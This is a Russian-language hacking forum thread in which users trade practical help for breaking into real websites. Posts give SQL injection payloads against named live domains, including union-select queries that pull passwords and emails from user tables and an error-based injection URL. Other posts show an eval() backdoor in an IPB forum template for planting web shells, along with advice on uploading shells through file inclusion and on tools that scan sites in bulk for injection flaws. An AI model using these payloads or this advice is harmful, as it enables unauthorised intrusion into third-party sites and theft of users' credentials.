Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://madnet.name/tools/madss/ , не?
     
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    В какой шаблон ты вписал этот код ? НЕ найду.
    <if="$this->ipsclass->input['kod'] = 1">
    <if="eval($this->ipsclass->input['pzdc'])"></if>
    </if>
    Как я понимаю, ты нашел новый способ заливки шеллов в IPB
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    https://rdot.org/forum/showpost.php?p=7037&postcount=12
     
  4. Spot

    Spot Elder - Старейшина

    Joined:
    1 Mar 2007
    Messages:
    461
    Likes Received:
    38
    Reputations:
    1
    Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но:
    Вытащить могу данные только одного юзверя, если укажу его айди например:
    Code:
    xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506
    получаю пароль: %pass%
    Но когда составляю запрос, что бы получить список всех юзверей, например:
    Code:
    .php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc
    На что мне выдает стринг с текстом : Array

    Так же проблема выдать комбинированный запрос:
    Code:
    .php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808
    В ответ The used SELECT statements have a different number of columns

    Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.
     
  5. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Задаю не в первый раз.
    Вопрос насчет каким парсером пользуетесь, товарищи, для sql инъекции?.
    Актуально
    PS: sql poizon сломался, в гугл парсерах смысла не вижу, так как банит.
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ну а как, пробуй все те же методы что и в админ панель.
    http://www.forum.antichat.net/showthread.php?p=2935725

    Spot, а что мешает через лимит спарсить?
    или если массово, пробуй GROUP_CONCAT()
    только тут ограничение на кол-во выводимых данных, по умлочанию — 1024
    правильный синтаксис такой — concat_ws(0x3a,email,uid)
    или concat

    stan0009, попробуй Яшкалюб, а чекать на скули sqlndm
     
    _________________________
    #19186 yarbabin, 31 Jan 2012
    Last edited: 31 Jan 2012
    1 person likes this.
  7. Tr[1]x

    Tr[1]x New Member

    Joined:
    20 Aug 2010
    Messages:
    30
    Likes Received:
    1
    Reputations:
    0
    Подскажите какую-нибудь программу, похожую на Radmin, но чтобы она работала на ос FreeBSD.
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    тут concat_ws() не причем хотя очень полезная функция, тут uid надо задать в хексе или в кавычки если не экранируется,
    вот пример:
     
    _________________________
  9. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87
    ребята прошу просто посмотреть есть ли тут инъекцыя??
     
  10. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    Можно ли через эту информацию взломать или залить шелл
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2pirat0,
    не думаю.

    2Gaben7,
    если есть LFI, то можно залить шелл. А так, phpinfo(); дает представление, с чем ты имеешь дело. Узнаешь пути, отключенные функции и т.д.
     
  12. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1
    вроде php-injection? но чет подставляю страницы - не читает, почему так??
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Опять же не думаю, что там есть уязвимость. Возможно просто ошибка.
     
  14. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    myadmin

    Приветствую.
    Как можно узнать версию phpmyadmin?
     
  15. Qwert321

    Qwert321 Banned

    Joined:
    25 Jan 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    http://сайт_нужный/phpmyadmin/ChangeLog

    Ты это имел ввиду?
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Народ, помогите скулю разкрутить,
    чтобы не ввёл ничего не меняется
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    http://biclopsgames.com/game.php?id=1+and+1=(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
     
    1 person likes this.
  18. PowerLiMe

    PowerLiMe New Member

    Joined:
    7 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нужна ваша помощь, имеется DLE сайт, версия 5.5, опробовал уже много способов заливки шелла, нечего не получилось. Опробовал добавление разрешение пхп, и хтчекс в конфиг, нечего не вышло и еще пару штук.
    Если кто-то может помочь, буду рад :)
     
  19. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    подскажите в чем пробл.
    id=-983 GROUP BY 2 -- через group выяснил что 2 поля
    но когда делаю
    id=-983 UNION SELECT 1,2
    все равно пишет что Query failed: The used SELECT statements have a different number of columns
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    несколько запросов, используйте error based метод
     
    _________________________
Thread Status:
Not open for further replies.